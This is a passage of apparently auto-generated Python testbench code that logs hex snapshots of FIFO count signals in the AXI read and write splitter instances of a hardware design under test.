logs.log_info("SNP %x tb.dut.split102.axi_wr_4_splitter.order_fifo.count" % logs.peek("tb.dut.split102.axi_wr_4_splitter.order_fifo.count"))
logs.log_info("SNP %x tb.dut.split102.axi_wr_4_splitter.w_fifo.next_count" % logs.peek("tb.dut.split102.axi_wr_4_splitter.w_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split102.axi_wr_4_splitter.w_fifo.count" % logs.peek("tb.dut.split102.axi_wr_4_splitter.w_fifo.count"))
logs.log_info("SNP %x tb.dut.split103.axi_rd_4_splitter.ar_fifo.next_count" % logs.peek("tb.dut.split103.axi_rd_4_splitter.ar_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split103.axi_rd_4_splitter.ar_fifo.count" % logs.peek("tb.dut.split103.axi_rd_4_splitter.ar_fifo.count"))
logs.log_info("SNP %x tb.dut.split103.axi_rd_4_splitter.r_fifo.next_count" % logs.peek("tb.dut.split103.axi_rd_4_splitter.r_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split103.axi_rd_4_splitter.r_fifo.count" % logs.peek("tb.dut.split103.axi_rd_4_splitter.r_fifo.count"))
logs.log_info("SNP %x tb.dut.split103.axi_wr_4_splitter.a_bcount" % logs.peek("tb.dut.split103.axi_wr_4_splitter.a_bcount"))
logs.log_info("SNP %x tb.dut.split103.axi_wr_4_splitter.b_bcount" % logs.peek("tb.dut.split103.axi_wr_4_splitter.b_bcount"))
logs.log_info("SNP %x tb.dut.split103.axi_wr_4_splitter.c_bcount" % logs.peek("tb.dut.split103.axi_wr_4_splitter.c_bcount"))
logs.log_info("SNP %x tb.dut.split103.axi_wr_4_splitter.d_bcount" % logs.peek("tb.dut.split103.axi_wr_4_splitter.d_bcount"))
logs.log_info("SNP %x tb.dut.split103.axi_wr_4_splitter.aw_fifo.next_count" % logs.peek("tb.dut.split103.axi_wr_4_splitter.aw_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split103.axi_wr_4_splitter.aw_fifo.count" % logs.peek("tb.dut.split103.axi_wr_4_splitter.aw_fifo.count"))
logs.log_info("SNP %x tb.dut.split103.axi_wr_4_splitter.b_fifo.next_count" % logs.peek("tb.dut.split103.axi_wr_4_splitter.b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split103.axi_wr_4_splitter.b_fifo.count" % logs.peek("tb.dut.split103.axi_wr_4_splitter.b_fifo.count"))
logs.log_info("SNP %x tb.dut.split103.axi_wr_4_splitter.back_bid_a_fifo.count" % logs.peek("tb.dut.split103.axi_wr_4_splitter.back_bid_a_fifo.count"))
logs.log_info("SNP %x tb.dut.split103.axi_wr_4_splitter.back_bid_a_fifo.int_count" % logs.peek("tb.dut.split103.axi_wr_4_splitter.back_bid_a_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split103.axi_wr_4_splitter.back_bid_b_fifo.count" % logs.peek("tb.dut.split103.axi_wr_4_splitter.back_bid_b_fifo.count"))
logs.log_info("SNP %x tb.dut.split103.axi_wr_4_splitter.back_bid_b_fifo.int_count" % logs.peek("tb.dut.split103.axi_wr_4_splitter.back_bid_b_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split103.axi_wr_4_splitter.back_bid_c_fifo.count" % logs.peek("tb.dut.split103.axi_wr_4_splitter.back_bid_c_fifo.count"))
logs.log_info("SNP %x tb.dut.split103.axi_wr_4_splitter.back_bid_c_fifo.int_count" % logs.peek("tb.dut.split103.axi_wr_4_splitter.back_bid_c_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split103.axi_wr_4_splitter.back_bid_d_fifo.count" % logs.peek("tb.dut.split103.axi_wr_4_splitter.back_bid_d_fifo.count"))
logs.log_info("SNP %x tb.dut.split103.axi_wr_4_splitter.back_bid_d_fifo.int_count" % logs.peek("tb.dut.split103.axi_wr_4_splitter.back_bid_d_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split103.axi_wr_4_splitter.order_fifo.next_count" % logs.peek("tb.dut.split103.axi_wr_4_splitter.order_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split103.axi_wr_4_splitter.order_fifo.count" % logs.peek("tb.dut.split103.axi_wr_4_splitter.order_fifo.count"))
logs.log_info("SNP %x tb.dut.split103.axi_wr_4_splitter.w_fifo.next_count" % logs.peek("tb.dut.split103.axi_wr_4_splitter.w_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split103.axi_wr_4_splitter.w_fifo.count" % logs.peek("tb.dut.split103.axi_wr_4_splitter.w_fifo.count"))
logs.log_info("SNP %x tb.dut.split104.axi_rd_4_splitter.ar_fifo.next_count" % logs.peek("tb.dut.split104.axi_rd_4_splitter.ar_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split104.axi_rd_4_splitter.ar_fifo.count" % logs.peek("tb.dut.split104.axi_rd_4_splitter.ar_fifo.count"))
logs.log_info("SNP %x tb.dut.split104.axi_rd_4_splitter.r_fifo.next_count" % logs.peek("tb.dut.split104.axi_rd_4_splitter.r_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split104.axi_rd_4_splitter.r_fifo.count" % logs.peek("tb.dut.split104.axi_rd_4_splitter.r_fifo.count"))
logs.log_info("SNP %x tb.dut.split104.axi_wr_4_splitter.a_bcount" % logs.peek("tb.dut.split104.axi_wr_4_splitter.a_bcount"))
logs.log_info("SNP %x tb.dut.split104.axi_wr_4_splitter.b_bcount" % logs.peek("tb.dut.split104.axi_wr_4_splitter.b_bcount"))
logs.log_info("SNP %x tb.dut.split104.axi_wr_4_splitter.c_bcount" % logs.peek("tb.dut.split104.axi_wr_4_splitter.c_bcount"))
logs.log_info("SNP %x tb.dut.split104.axi_wr_4_splitter.d_bcount" % logs.peek("tb.dut.split104.axi_wr_4_splitter.d_bcount"))
logs.log_info("SNP %x tb.dut.split104.axi_wr_4_splitter.aw_fifo.next_count" % logs.peek("tb.dut.split104.axi_wr_4_splitter.aw_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split104.axi_wr_4_splitter.aw_fifo.count" % logs.peek("tb.dut.split104.axi_wr_4_splitter.aw_fifo.count"))
logs.log_info("SNP %x tb.dut.split104.axi_wr_4_splitter.b_fifo.next_count" % logs.peek("tb.dut.split104.axi_wr_4_splitter.b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split104.axi_wr_4_splitter.b_fifo.count" % logs.peek("tb.dut.split104.axi_wr_4_splitter.b_fifo.count"))
logs.log_info("SNP %x tb.dut.split104.axi_wr_4_splitter.back_bid_a_fifo.count" % logs.peek("tb.dut.split104.axi_wr_4_splitter.back_bid_a_fifo.count"))
logs.log_info("SNP %x tb.dut.split104.axi_wr_4_splitter.back_bid_a_fifo.int_count" % logs.peek("tb.dut.split104.axi_wr_4_splitter.back_bid_a_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split104.axi_wr_4_splitter.back_bid_b_fifo.count" % logs.peek("tb.dut.split104.axi_wr_4_splitter.back_bid_b_fifo.count"))
logs.log_info("SNP %x tb.dut.split104.axi_wr_4_splitter.back_bid_b_fifo.int_count" % logs.peek("tb.dut.split104.axi_wr_4_splitter.back_bid_b_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split104.axi_wr_4_splitter.back_bid_c_fifo.count" % logs.peek("tb.dut.split104.axi_wr_4_splitter.back_bid_c_fifo.count"))
logs.log_info("SNP %x tb.dut.split104.axi_wr_4_splitter.back_bid_c_fifo.int_count" % logs.peek("tb.dut.split104.axi_wr_4_splitter.back_bid_c_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split104.axi_wr_4_splitter.back_bid_d_fifo.count" % logs.peek("tb.dut.split104.axi_wr_4_splitter.back_bid_d_fifo.count"))
logs.log_info("SNP %x tb.dut.split104.axi_wr_4_splitter.back_bid_d_fifo.int_count" % logs.peek("tb.dut.split104.axi_wr_4_splitter.back_bid_d_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split104.axi_wr_4_splitter.order_fifo.next_count" % logs.peek("tb.dut.split104.axi_wr_4_splitter.order_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split104.axi_wr_4_splitter.order_fifo.count" % logs.peek("tb.dut.split104.axi_wr_4_splitter.order_fifo.count"))
logs.log_info("SNP %x tb.dut.split104.axi_wr_4_splitter.w_fifo.next_count" % logs.peek("tb.dut.split104.axi_wr_4_splitter.w_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split104.axi_wr_4_splitter.w_fifo.count" % logs.peek("tb.dut.split104.axi_wr_4_splitter.w_fifo.count"))
logs.log_info("SNP %x tb.dut.split105.axi_rd_4_splitter.ar_fifo.next_count" % logs.peek("tb.dut.split105.axi_rd_4_splitter.ar_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split105.axi_rd_4_splitter.ar_fifo.count" % logs.peek("tb.dut.split105.axi_rd_4_splitter.ar_fifo.count"))
logs.log_info("SNP %x tb.dut.split105.axi_rd_4_splitter.r_fifo.next_count" % logs.peek("tb.dut.split105.axi_rd_4_splitter.r_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split105.axi_rd_4_splitter.r_fifo.count" % logs.peek("tb.dut.split105.axi_rd_4_splitter.r_fifo.count"))
logs.log_info("SNP %x tb.dut.split105.axi_wr_4_splitter.a_bcount" % logs.peek("tb.dut.split105.axi_wr_4_splitter.a_bcount"))
logs.log_info("SNP %x tb.dut.split105.axi_wr_4_splitter.b_bcount" % logs.peek("tb.dut.split105.axi_wr_4_splitter.b_bcount"))
logs.log_info("SNP %x tb.dut.split105.axi_wr_4_splitter.c_bcount" % logs.peek("tb.dut.split105.axi_wr_4_splitter.c_bcount"))
logs.log_info("SNP %x tb.dut.split105.axi_wr_4_splitter.d_bcount" % logs.peek("tb.dut.split105.axi_wr_4_splitter.d_bcount"))
logs.log_info("SNP %x tb.dut.split105.axi_wr_4_splitter.aw_fifo.next_count" % logs.peek("tb.dut.split105.axi_wr_4_splitter.aw_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split105.axi_wr_4_splitter.aw_fifo.count" % logs.peek("tb.dut.split105.axi_wr_4_splitter.aw_fifo.count"))
logs.log_info("SNP %x tb.dut.split105.axi_wr_4_splitter.b_fifo.next_count" % logs.peek("tb.dut.split105.axi_wr_4_splitter.b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split105.axi_wr_4_splitter.b_fifo.count" % logs.peek("tb.dut.split105.axi_wr_4_splitter.b_fifo.count"))
logs.log_info("SNP %x tb.dut.split105.axi_wr_4_splitter.back_bid_a_fifo.count" % logs.peek("tb.dut.split105.axi_wr_4_splitter.back_bid_a_fifo.count"))
logs.log_info("SNP %x tb.dut.split105.axi_wr_4_splitter.back_bid_a_fifo.int_count" % logs.peek("tb.dut.split105.axi_wr_4_splitter.back_bid_a_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split105.axi_wr_4_splitter.back_bid_b_fifo.count" % logs.peek("tb.dut.split105.axi_wr_4_splitter.back_bid_b_fifo.count"))
logs.log_info("SNP %x tb.dut.split105.axi_wr_4_splitter.back_bid_b_fifo.int_count" % logs.peek("tb.dut.split105.axi_wr_4_splitter.back_bid_b_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split105.axi_wr_4_splitter.back_bid_c_fifo.count" % logs.peek("tb.dut.split105.axi_wr_4_splitter.back_bid_c_fifo.count"))
logs.log_info("SNP %x tb.dut.split105.axi_wr_4_splitter.back_bid_c_fifo.int_count" % logs.peek("tb.dut.split105.axi_wr_4_splitter.back_bid_c_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split105.axi_wr_4_splitter.back_bid_d_fifo.count" % logs.peek("tb.dut.split105.axi_wr_4_splitter.back_bid_d_fifo.count"))
logs.log_info("SNP %x tb.dut.split105.axi_wr_4_splitter.back_bid_d_fifo.int_count" % logs.peek("tb.dut.split105.axi_wr_4_splitter.back_bid_d_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split105.axi_wr_4_splitter.order_fifo.next_count" % logs.peek("tb.dut.split105.axi_wr_4_splitter.order_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split105.axi_wr_4_splitter.order_fifo.count" % logs.peek("tb.dut.split105.axi_wr_4_splitter.order_fifo.count"))
logs.log_info("SNP %x tb.dut.split105.axi_wr_4_splitter.w_fifo.next_count" % logs.peek("tb.dut.split105.axi_wr_4_splitter.w_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split105.axi_wr_4_splitter.w_fifo.count" % logs.peek("tb.dut.split105.axi_wr_4_splitter.w_fifo.count"))
logs.log_info("SNP %x tb.dut.split106.axi_rd_4_splitter.ar_fifo.next_count" % logs.peek("tb.dut.split106.axi_rd_4_splitter.ar_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split106.axi_rd_4_splitter.ar_fifo.count" % logs.peek("tb.dut.split106.axi_rd_4_splitter.ar_fifo.count"))
logs.log_info("SNP %x tb.dut.split106.axi_rd_4_splitter.r_fifo.next_count" % logs.peek("tb.dut.split106.axi_rd_4_splitter.r_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split106.axi_rd_4_splitter.r_fifo.count" % logs.peek("tb.dut.split106.axi_rd_4_splitter.r_fifo.count"))
logs.log_info("SNP %x tb.dut.split106.axi_wr_4_splitter.a_bcount" % logs.peek("tb.dut.split106.axi_wr_4_splitter.a_bcount"))
logs.log_info("SNP %x tb.dut.split106.axi_wr_4_splitter.b_bcount" % logs.peek("tb.dut.split106.axi_wr_4_splitter.b_bcount"))
logs.log_info("SNP %x tb.dut.split106.axi_wr_4_splitter.c_bcount" % logs.peek("tb.dut.split106.axi_wr_4_splitter.c_bcount"))
logs.log_info("SNP %x tb.dut.split106.axi_wr_4_splitter.d_bcount" % logs.peek("tb.dut.split106.axi_wr_4_splitter.d_bcount"))
logs.log_info("SNP %x tb.dut.split106.axi_wr_4_splitter.aw_fifo.next_count" % logs.peek("tb.dut.split106.axi_wr_4_splitter.aw_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split106.axi_wr_4_splitter.aw_fifo.count" % logs.peek("tb.dut.split106.axi_wr_4_splitter.aw_fifo.count"))
logs.log_info("SNP %x tb.dut.split106.axi_wr_4_splitter.b_fifo.next_count" % logs.peek("tb.dut.split106.axi_wr_4_splitter.b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split106.axi_wr_4_splitter.b_fifo.count" % logs.peek("tb.dut.split106.axi_wr_4_splitter.b_fifo.count"))
logs.log_info("SNP %x tb.dut.split106.axi_wr_4_splitter.back_bid_a_fifo.count" % logs.peek("tb.dut.split106.axi_wr_4_splitter.back_bid_a_fifo.count"))
logs.log_info("SNP %x tb.dut.split106.axi_wr_4_splitter.back_bid_a_fifo.int_count" % logs.peek("tb.dut.split106.axi_wr_4_splitter.back_bid_a_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split106.axi_wr_4_splitter.back_bid_b_fifo.count" % logs.peek("tb.dut.split106.axi_wr_4_splitter.back_bid_b_fifo.count"))
logs.log_info("SNP %x tb.dut.split106.axi_wr_4_splitter.back_bid_b_fifo.int_count" % logs.peek("tb.dut.split106.axi_wr_4_splitter.back_bid_b_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split106.axi_wr_4_splitter.back_bid_c_fifo.count" % logs.peek("tb.dut.split106.axi_wr_4_splitter.back_bid_c_fifo.count"))
logs.log_info("SNP %x tb.dut.split106.axi_wr_4_splitter.back_bid_c_fifo.int_count" % logs.peek("tb.dut.split106.axi_wr_4_splitter.back_bid_c_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split106.axi_wr_4_splitter.back_bid_d_fifo.count" % logs.peek("tb.dut.split106.axi_wr_4_splitter.back_bid_d_fifo.count"))
logs.log_info("SNP %x tb.dut.split106.axi_wr_4_splitter.back_bid_d_fifo.int_count" % logs.peek("tb.dut.split106.axi_wr_4_splitter.back_bid_d_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split106.axi_wr_4_splitter.order_fifo.next_count" % logs.peek("tb.dut.split106.axi_wr_4_splitter.order_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split106.axi_wr_4_splitter.order_fifo.count" % logs.peek("tb.dut.split106.axi_wr_4_splitter.order_fifo.count"))
logs.log_info("SNP %x tb.dut.split106.axi_wr_4_splitter.w_fifo.next_count" % logs.peek("tb.dut.split106.axi_wr_4_splitter.w_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split106.axi_wr_4_splitter.w_fifo.count" % logs.peek("tb.dut.split106.axi_wr_4_splitter.w_fifo.count"))
logs.log_info("SNP %x tb.dut.split107.axi_rd_4_splitter.ar_fifo.next_count" % logs.peek("tb.dut.split107.axi_rd_4_splitter.ar_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split107.axi_rd_4_splitter.ar_fifo.count" % logs.peek("tb.dut.split107.axi_rd_4_splitter.ar_fifo.count"))
logs.log_info("SNP %x tb.dut.split107.axi_rd_4_splitter.r_fifo.next_count" % logs.peek("tb.dut.split107.axi_rd_4_splitter.r_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split107.axi_rd_4_splitter.r_fifo.count" % logs.peek("tb.dut.split107.axi_rd_4_splitter.r_fifo.count"))
logs.log_info("SNP %x tb.dut.split107.axi_wr_4_splitter.a_bcount" % logs.peek("tb.dut.split107.axi_wr_4_splitter.a_bcount"))
logs.log_info("SNP %x tb.dut.split107.axi_wr_4_splitter.b_bcount" % logs.peek("tb.dut.split107.axi_wr_4_splitter.b_bcount"))
logs.log_info("SNP %x tb.dut.split107.axi_wr_4_splitter.c_bcount" % logs.peek("tb.dut.split107.axi_wr_4_splitter.c_bcount"))
logs.log_info("SNP %x tb.dut.split107.axi_wr_4_splitter.d_bcount" % logs.peek("tb.dut.split107.axi_wr_4_splitter.d_bcount"))
logs.log_info("SNP %x tb.dut.split107.axi_wr_4_splitter.aw_fifo.next_count" % logs.peek("tb.dut.split107.axi_wr_4_splitter.aw_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split107.axi_wr_4_splitter.aw_fifo.count" % logs.peek("tb.dut.split107.axi_wr_4_splitter.aw_fifo.count"))
logs.log_info("SNP %x tb.dut.split107.axi_wr_4_splitter.b_fifo.next_count" % logs.peek("tb.dut.split107.axi_wr_4_splitter.b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split107.axi_wr_4_splitter.b_fifo.count" % logs.peek("tb.dut.split107.axi_wr_4_splitter.b_fifo.count"))
logs.log_info("SNP %x tb.dut.split107.axi_wr_4_splitter.back_bid_a_fifo.count" % logs.peek("tb.dut.split107.axi_wr_4_splitter.back_bid_a_fifo.count"))
logs.log_info("SNP %x tb.dut.split107.axi_wr_4_splitter.back_bid_a_fifo.int_count" % logs.peek("tb.dut.split107.axi_wr_4_splitter.back_bid_a_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split107.axi_wr_4_splitter.back_bid_b_fifo.count" % logs.peek("tb.dut.split107.axi_wr_4_splitter.back_bid_b_fifo.count"))
logs.log_info("SNP %x tb.dut.split107.axi_wr_4_splitter.back_bid_b_fifo.int_count" % logs.peek("tb.dut.split107.axi_wr_4_splitter.back_bid_b_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split107.axi_wr_4_splitter.back_bid_c_fifo.count" % logs.peek("tb.dut.split107.axi_wr_4_splitter.back_bid_c_fifo.count"))
logs.log_info("SNP %x tb.dut.split107.axi_wr_4_splitter.back_bid_c_fifo.int_count" % logs.peek("tb.dut.split107.axi_wr_4_splitter.back_bid_c_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split107.axi_wr_4_splitter.back_bid_d_fifo.count" % logs.peek("tb.dut.split107.axi_wr_4_splitter.back_bid_d_fifo.count"))
logs.log_info("SNP %x tb.dut.split107.axi_wr_4_splitter.back_bid_d_fifo.int_count" % logs.peek("tb.dut.split107.axi_wr_4_splitter.back_bid_d_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split107.axi_wr_4_splitter.order_fifo.next_count" % logs.peek("tb.dut.split107.axi_wr_4_splitter.order_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split107.axi_wr_4_splitter.order_fifo.count" % logs.peek("tb.dut.split107.axi_wr_4_splitter.order_fifo.count"))
logs.log_info("SNP %x tb.dut.split107.axi_wr_4_splitter.w_fifo.next_count" % logs.peek("tb.dut.split107.axi_wr_4_splitter.w_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split107.axi_wr_4_splitter.w_fifo.count" % logs.peek("tb.dut.split107.axi_wr_4_splitter.w_fifo.count"))
logs.log_info("SNP %x tb.dut.split108.axi_rd_4_splitter.ar_fifo.next_count" % logs.peek("tb.dut.split108.axi_rd_4_splitter.ar_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split108.axi_rd_4_splitter.ar_fifo.count" % logs.peek("tb.dut.split108.axi_rd_4_splitter.ar_fifo.count"))
logs.log_info("SNP %x tb.dut.split108.axi_rd_4_splitter.r_fifo.next_count" % logs.peek("tb.dut.split108.axi_rd_4_splitter.r_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split108.axi_rd_4_splitter.r_fifo.count" % logs.peek("tb.dut.split108.axi_rd_4_splitter.r_fifo.count"))
logs.log_info("SNP %x tb.dut.split108.axi_wr_4_splitter.a_bcount" % logs.peek("tb.dut.split108.axi_wr_4_splitter.a_bcount"))
logs.log_info("SNP %x tb.dut.split108.axi_wr_4_splitter.b_bcount" % logs.peek("tb.dut.split108.axi_wr_4_splitter.b_bcount"))
logs.log_info("SNP %x tb.dut.split108.axi_wr_4_splitter.c_bcount" % logs.peek("tb.dut.split108.axi_wr_4_splitter.c_bcount"))
logs.log_info("SNP %x tb.dut.split108.axi_wr_4_splitter.d_bcount" % logs.peek("tb.dut.split108.axi_wr_4_splitter.d_bcount"))
logs.log_info("SNP %x tb.dut.split108.axi_wr_4_splitter.aw_fifo.next_count" % logs.peek("tb.dut.split108.axi_wr_4_splitter.aw_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split108.axi_wr_4_splitter.aw_fifo.count" % logs.peek("tb.dut.split108.axi_wr_4_splitter.aw_fifo.count"))
logs.log_info("SNP %x tb.dut.split108.axi_wr_4_splitter.b_fifo.next_count" % logs.peek("tb.dut.split108.axi_wr_4_splitter.b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split108.axi_wr_4_splitter.b_fifo.count" % logs.peek("tb.dut.split108.axi_wr_4_splitter.b_fifo.count"))
logs.log_info("SNP %x tb.dut.split108.axi_wr_4_splitter.back_bid_a_fifo.count" % logs.peek("tb.dut.split108.axi_wr_4_splitter.back_bid_a_fifo.count"))
logs.log_info("SNP %x tb.dut.split108.axi_wr_4_splitter.back_bid_a_fifo.int_count" % logs.peek("tb.dut.split108.axi_wr_4_splitter.back_bid_a_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split108.axi_wr_4_splitter.back_bid_b_fifo.count" % logs.peek("tb.dut.split108.axi_wr_4_splitter.back_bid_b_fifo.count"))
logs.log_info("SNP %x tb.dut.split108.axi_wr_4_splitter.back_bid_b_fifo.int_count" % logs.peek("tb.dut.split108.axi_wr_4_splitter.back_bid_b_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split108.axi_wr_4_splitter.back_bid_c_fifo.count" % logs.peek("tb.dut.split108.axi_wr_4_splitter.back_bid_c_fifo.count"))
logs.log_info("SNP %x tb.dut.split108.axi_wr_4_splitter.back_bid_c_fifo.int_count" % logs.peek("tb.dut.split108.axi_wr_4_splitter.back_bid_c_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split108.axi_wr_4_splitter.back_bid_d_fifo.count" % logs.peek("tb.dut.split108.axi_wr_4_splitter.back_bid_d_fifo.count"))
logs.log_info("SNP %x tb.dut.split108.axi_wr_4_splitter.back_bid_d_fifo.int_count" % logs.peek("tb.dut.split108.axi_wr_4_splitter.back_bid_d_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split108.axi_wr_4_splitter.order_fifo.next_count" % logs.peek("tb.dut.split108.axi_wr_4_splitter.order_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split108.axi_wr_4_splitter.order_fifo.count" % logs.peek("tb.dut.split108.axi_wr_4_splitter.order_fifo.count"))
logs.log_info("SNP %x tb.dut.split108.axi_wr_4_splitter.w_fifo.next_count" % logs.peek("tb.dut.split108.axi_wr_4_splitter.w_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split108.axi_wr_4_splitter.w_fifo.count" % logs.peek("tb.dut.split108.axi_wr_4_splitter.w_fifo.count"))
logs.log_info("SNP %x tb.dut.split109.axi_rd_4_splitter.ar_fifo.next_count" % logs.peek("tb.dut.split109.axi_rd_4_splitter.ar_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split109.axi_rd_4_splitter.ar_fifo.count" % logs.peek("tb.dut.split109.axi_rd_4_splitter.ar_fifo.count"))
logs.log_info("SNP %x tb.dut.split109.axi_rd_4_splitter.r_fifo.next_count" % logs.peek("tb.dut.split109.axi_rd_4_splitter.r_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split109.axi_rd_4_splitter.r_fifo.count" % logs.peek("tb.dut.split109.axi_rd_4_splitter.r_fifo.count"))
logs.log_info("SNP %x tb.dut.split109.axi_wr_4_splitter.a_bcount" % logs.peek("tb.dut.split109.axi_wr_4_splitter.a_bcount"))
logs.log_info("SNP %x tb.dut.split109.axi_wr_4_splitter.b_bcount" % logs.peek("tb.dut.split109.axi_wr_4_splitter.b_bcount"))
logs.log_info("SNP %x tb.dut.split109.axi_wr_4_splitter.c_bcount" % logs.peek("tb.dut.split109.axi_wr_4_splitter.c_bcount"))
logs.log_info("SNP %x tb.dut.split109.axi_wr_4_splitter.d_bcount" % logs.peek("tb.dut.split109.axi_wr_4_splitter.d_bcount"))
logs.log_info("SNP %x tb.dut.split109.axi_wr_4_splitter.aw_fifo.next_count" % logs.peek("tb.dut.split109.axi_wr_4_splitter.aw_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split109.axi_wr_4_splitter.aw_fifo.count" % logs.peek("tb.dut.split109.axi_wr_4_splitter.aw_fifo.count"))
logs.log_info("SNP %x tb.dut.split109.axi_wr_4_splitter.b_fifo.next_count" % logs.peek("tb.dut.split109.axi_wr_4_splitter.b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split109.axi_wr_4_splitter.b_fifo.count" % logs.peek("tb.dut.split109.axi_wr_4_splitter.b_fifo.count"))
logs.log_info("SNP %x tb.dut.split109.axi_wr_4_splitter.back_bid_a_fifo.count" % logs.peek("tb.dut.split109.axi_wr_4_splitter.back_bid_a_fifo.count"))
logs.log_info("SNP %x tb.dut.split109.axi_wr_4_splitter.back_bid_a_fifo.int_count" % logs.peek("tb.dut.split109.axi_wr_4_splitter.back_bid_a_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split109.axi_wr_4_splitter.back_bid_b_fifo.count" % logs.peek("tb.dut.split109.axi_wr_4_splitter.back_bid_b_fifo.count"))
logs.log_info("SNP %x tb.dut.split109.axi_wr_4_splitter.back_bid_b_fifo.int_count" % logs.peek("tb.dut.split109.axi_wr_4_splitter.back_bid_b_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split109.axi_wr_4_splitter.back_bid_c_fifo.count" % logs.peek("tb.dut.split109.axi_wr_4_splitter.back_bid_c_fifo.count"))
logs.log_info("SNP %x tb.dut.split109.axi_wr_4_splitter.back_bid_c_fifo.int_count" % logs.peek("tb.dut.split109.axi_wr_4_splitter.back_bid_c_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split109.axi_wr_4_splitter.back_bid_d_fifo.count" % logs.peek("tb.dut.split109.axi_wr_4_splitter.back_bid_d_fifo.count"))
logs.log_info("SNP %x tb.dut.split109.axi_wr_4_splitter.back_bid_d_fifo.int_count" % logs.peek("tb.dut.split109.axi_wr_4_splitter.back_bid_d_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split109.axi_wr_4_splitter.order_fifo.next_count" % logs.peek("tb.dut.split109.axi_wr_4_splitter.order_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split109.axi_wr_4_splitter.order_fifo.count" % logs.peek("tb.dut.split109.axi_wr_4_splitter.order_fifo.count"))
logs.log_info("SNP %x tb.dut.split109.axi_wr_4_splitter.w_fifo.next_count" % logs.peek("tb.dut.split109.axi_wr_4_splitter.w_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split109.axi_wr_4_splitter.w_fifo.count" % logs.peek("tb.dut.split109.axi_wr_4_splitter.w_fifo.count"))
logs.log_info("SNP %x tb.dut.split11.axi_rd_4_splitter.ar_fifo.next_count" % logs.peek("tb.dut.split11.axi_rd_4_splitter.ar_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split11.axi_rd_4_splitter.ar_fifo.count" % logs.peek("tb.dut.split11.axi_rd_4_splitter.ar_fifo.count"))
logs.log_info("SNP %x tb.dut.split11.axi_rd_4_splitter.r_fifo.next_count" % logs.peek("tb.dut.split11.axi_rd_4_splitter.r_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split11.axi_rd_4_splitter.r_fifo.count" % logs.peek("tb.dut.split11.axi_rd_4_splitter.r_fifo.count"))
logs.log_info("SNP %x tb.dut.split11.axi_wr_4_splitter.a_bcount" % logs.peek("tb.dut.split11.axi_wr_4_splitter.a_bcount"))
logs.log_info("SNP %x tb.dut.split11.axi_wr_4_splitter.b_bcount" % logs.peek("tb.dut.split11.axi_wr_4_splitter.b_bcount"))
logs.log_info("SNP %x tb.dut.split11.axi_wr_4_splitter.c_bcount" % logs.peek("tb.dut.split11.axi_wr_4_splitter.c_bcount"))
logs.log_info("SNP %x tb.dut.split11.axi_wr_4_splitter.d_bcount" % logs.peek("tb.dut.split11.axi_wr_4_splitter.d_bcount"))
